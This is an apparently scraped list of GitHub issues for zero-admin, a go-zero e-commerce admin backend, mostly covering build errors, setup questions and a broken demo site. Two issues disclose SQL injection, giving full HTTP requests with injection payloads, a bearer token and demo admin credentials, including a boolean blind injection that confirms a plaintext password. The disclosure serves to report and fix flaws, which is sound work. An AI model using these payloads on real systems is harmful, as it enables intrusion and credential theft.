feihua / zero-admin Goto Github PK
View Code? Open in Web Editor NEWZero-Admin 是一套基于 go-zero 框架实现的电商系统的后端服务
Home Page: https://feihua.github.io
License: Apache License 2.0
zero-admin's Issues
可以给个sql文件吗
用户权限管理是用什么实现的?
casbin在用户权限这块用得比较多,但是go.mod里没看到casbin, 请教下本项目是怎么实现用户权限分配和管理的。
没找到background url 赋值的地方,是直接改数据库吗
SysMenu struct {
BackgroundUrl string `db:"background_url"` // 后台地址
}
代码质量堪忧,包命名,dao层 sql直接拼接,建议学一学代码规范,再拿来开源,可读性差的要死
代码质量堪忧,包命名,dao层 sql直接拼接,建议学一学代码规范,再拿来开源,可读性差的要死
请问下有定时任务的example吗?
有需求需要做定时任务
大佬 admin账号好像不小心被我删除了 可以在数据库重新插入一下吗😂抱歉抱歉!!!
您好,预览地址访问不了,能配置一下么?
http://129.204.22.242/ 账号:admin 密码: 123456
Connect Timeout
[D]Connect Timeout|dial tcp4 129.204.22.242:80: i/o timeout
项目本地启动和二次开发
Hi,这个项目本地启动和二次开发学习文档没那么清晰
[bug] sql 注入
sql 注入
此处代码对应的路由是 /api/sys/dict/list
zero-admin/rpc/model/sysmodel/sysdictmodel.go
Lines 36 to 58 in 744dccf
POST http://110.41.179.89/api/sys/dict/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 77
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/dict/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"current":1,"pageSize":1,"type":"1919810%' OR id = 2 AND '114514' like '%1"}
用户列表-翻页BUG
用户列表,点击翻页跳转再返回首页之后出现图中情况
请问作者 开发这个项目是使用的哪款go 的热重载工具啊
建了个企鹅交流群欢迎加群交流 83947309
点击链接加入群聊【zero-admin交流群】:https://jq.qq.com/?_wv=1027&k=Sk8azDv4
群号:83947309
front-api 目录作用是什么?
通过sh脚本,我看通过docker启动了api服务,但font-api 服务没有启动,请问下这个目录下的服务的用处是什么
你好想请问下项目命名的规范
有看到过go-zero,建议的文件命名规范是小写不要加_
我看到本项目,大部分目录和文件名的命名都是多个单词没有分割,全部用小写,这样做的目的是什么,没有分隔符看着会有一点怪
另外看到有两个目录front-api,common/errorx又是这样命名的.
预览网站登录不了
{userName: "admin", password: "123456", autoLogin: true, type: "account"}
返回
rpc error: code = Unknown desc = 用户密码不正确
点赞!
点赞!
演示网站崩了噢!
演示网站崩了噢!
大佬 项目很多地方调用的时候会提示field id is not set
大佬,我测试了好几个地方都存在field id is not set的情况,比如在会员管理删除会员的时候调用会提示
然后我在postman里面测试用id传是成功的
【bug】sms编译失败
执行docker build -t sms:v1 -f rpc/sms/Dockerfile .时报错:
#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductcategoryrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:79: in.Current undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:91: in.PageSize undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method PageSize)
#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:71: in.Current undefined (type *smsclient.CouponProductRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:83: in.PageSize undefined (type *smsclient.CouponProductRelationListReq has no field or method PageSize)
------
Dockerfile:13
--------------------
11 | RUN sh -c "[ -f go.mod ]" || exit
12 | COPY rpc/sms/etc /app/etc
13 | >>> RUN go build -ldflags="-s -w" -o /app/sms rpc/sms/sms.go
14 |
15 |
--------------------
ERROR: failed to solve: process "/bin/sh -c go build -ldflags=\"-s -w\" -o /app/sms rpc/sms/sms.go" did not complete successfully: exit code: 1
原因是这个提交 4c14598 将zero-admin\rpc\sms\smsclient\sms.pb.go中CouponProductCategoryRelationListReq中的Current、PageSize字段去除了,但是以下2处仍然依赖了Current、PageSize字段。
- zero-admin\rpc\sms\internal\logic\couponproductcategoryrelationservice\couponproductcategoryrelationlistlogic.go中的方法CouponProductCategoryRelationList
- zero-admin\rpc\sms\internal\logic\couponproductrelationservice\couponproductrelationlistlogic.go中的方法CouponProductRelationList
交流群不建一个似乎说不过去吧?毕竟作为第一个go-zero后台项目????
交流群不建一个似乎说不过去吧?毕竟作为第一个go-zero后台项目????
项目介绍
有没有哪位老哥大致跑过作者大大的这个项目,能简单说下业务结构和项目结构吗
SysLogAdd这个方法对应的就是操作日志吧,我没有找到项目没有用到这个方法,是没有调用吗?,还是我没有看到呀
SysLogAdd这个方法对应的就是操作日志吧,我没有找到项目没有用到这个方法,是没有调用吗?,还是我没有看到呀
怎么运行这个程序呢?
线上部署的预览地址没有菜单
您好,线上预览地址http://139.159.180.129:81/mall ,现在访问是没有菜单显示,是不是最新发包出错了?
需要规范下
PrefrenceArea这个报名大写 同级目录小写 需要规范下
缺少必要参数x-user-id
IP地址进去错误
[bug] sql 注入获取其他账号密码
sql 注入获取其他账号密码
此处代码对应的路由是 /api/sys/user/list
zero-admin/rpc/model/sysmodel/sysusermodel.go
Lines 61 to 84 in 744dccf
- 这段代码查的是带有账号密码字段的数据表,而且存在 sql 注入
- 数据库密码明文存储
那就可以使用布尔盲注挨个匹配出其他账号的密码明文
已知 demo 网站 admin 密码是 123456
此处做一个简单的注入判断
sys_user.username like '%admin' AND sys_user.passsword like '124%' 无匹配
POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 75
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}
sys_user.username like '%admin' AND sys_user.passsword like '123456%' 匹配成功
POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 78
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}
建议对路由进行分组
对路由按模块分组,便于管理
测试预览的网站无法登录
运行提示 unsupported time.Time。
问下作者是如何是api支持time.Time类型。
年过完了,该起来干活了
要不作者出个入门视频,大家一起完善
大佬 还是好多地方提示field brandId is not set
会员地址update
商品列表add update
退货列表update
订单列表update delete
还有会员地址的编辑按钮没有弹出编辑栏
建议可以打开多个页面。
公司前端模板技术选型,zero-admin因为不能打开多个页面,直接被否了。这个功能很实际。
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.